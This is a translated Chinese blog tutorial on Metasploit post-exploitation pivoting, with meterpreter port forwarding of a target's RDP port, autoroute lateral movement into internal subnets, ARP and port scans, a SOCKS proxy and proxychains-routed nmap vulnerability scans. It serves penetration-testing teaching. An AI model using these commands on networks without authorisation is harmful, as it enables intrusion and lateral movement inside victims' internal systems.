当前位置:网站首页>MSF horizontal MSF port forwarding + routing table +socks5+proxychains
MSF horizontal MSF port forwarding + routing table +socks5+proxychains
2022-07-06 17:58:00 【West Lake first sword】
MSF Some operations of post infiltration
Port forwarding
meterpreter > portfwd add -l 2222 -r 172.16.1.156 -p 3389 # Put the target machine 172.16.1.156 Of 3389 Port forwarding to local 2222 port
meterpreter > portfwd list # View the forwarding list
meterpreter > portfwd flush # Clear the forwarding list
rdesktop 127.0.0.1:2222 #kali Remote desktop use 2222 port
Add route , Lateral penetration ( Cross segment attack )
run autoroute -s 172.16.2.0/24 # Add to target environment network
run autoroute –p # View added routes
route print # Print route
run post/windows/gather/arp_scanner RHOSTS=172.16.2.0/24 # Scan the whole segment
run auxiliary/scanner/portscan/tcp RHOSTS=172.16.2.11 PORTS=3389 # Check IP Whether open 3389
utilize arp Scan intranet hosts
use post/windows/gather/arp_scanner
set rhosts 172.16.2.0/24
set session 1
exploit
Socks Agency
New version of the msf Different from the old version , The agent module is also different .
auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvport 7777
srvport => 7777
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
To configure proxychains
Use agent software to connect established socks Tunnel , You can successfully access the intranet .
vi /etc/proxychains.conf # add to socks5 127.0.0.1 7777
proxychains+nmap Scan the host for vulnerabilities
proxychains nmap -sT -Pn -p445 --script=vuln 192.168.52.141
proxychains Use msf frame
proxychains msfconsole
边栏推荐
- MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
- 容器里用systemctl运行服务报错:Failed to get D-Bus connection: Operation not permitted(解决方法)
- 最新财报发布+天猫618双榜第一,耐克蓄力领跑下个50年
- Kill -9 system call used by PID to kill process
- Optimization of middle alignment of loading style of device player in easycvr electronic map
- 酷雷曼多种AI数字人形象,打造科技感VR虚拟展厅
- 一体化实时 HTAP 数据库 StoneDB,如何替换 MySQL 并实现近百倍性能提升
- 编译原理——自上而下分析与递归下降分析构造(笔记)
- Solid principle
- FlutterWeb浏览器刷新后无法回退的解决方案
猜你喜欢

Summary of Android interview questions of Dachang in 2022 (II) (including answers)

Interview shock 62: what are the precautions for group by?

Unity tips - draw aiming Center

RB157-ASEMI整流桥RB157

FlutterWeb浏览器刷新后无法回退的解决方案

Awk command exercise

Open source and safe "song of ice and fire"

JMeter interface test response data garbled

The solution that flutterweb browser cannot be rolled back after refreshing
![[ASM] introduction and use of bytecode operation classwriter class](/img/0b/87c9851e577df8dcf8198a272b81bd.png)
[ASM] introduction and use of bytecode operation classwriter class
随机推荐
Jerry's watch deletes the existing dial file [chapter]
Pyspark operator processing spatial data full parsing (5): how to use spatial operation interface in pyspark
视频融合云平台EasyCVR增加多级分组,可灵活管理接入设备
Interview shock 62: what are the precautions for group by?
Spark accumulator and broadcast variables and beginners of sparksql
面试突击63:MySQL 中如何去重?
HMS Core 机器学习服务打造同传翻译新“声”态,AI让国际交流更顺畅
【MySQL入门】第一话 · 初入“数据库”大陆
遠程代碼執行滲透測試——B模塊測試
Compile and build, from the bottom to the top
重磅!蚂蚁开源可信隐私计算框架“隐语”,主流技术灵活组装、开发者友好分层设计...
Run xv6 system
The easycvr platform reports an error "ID cannot be empty" through the interface editing channel. What is the reason?
After entering Alibaba for the interview and returning with a salary of 35K, I summarized an interview question of Alibaba test engineer
Shell input a string of numbers to determine whether it is a mobile phone number
Summary of Android interview questions of Dachang in 2022 (II) (including answers)
微信小程序中给event对象传递数据
How to submit data through post
Flet教程之 13 ListView最常用的滚动控件 基础入门(教程含源码)
Essai de pénétration du Code à distance - essai du module b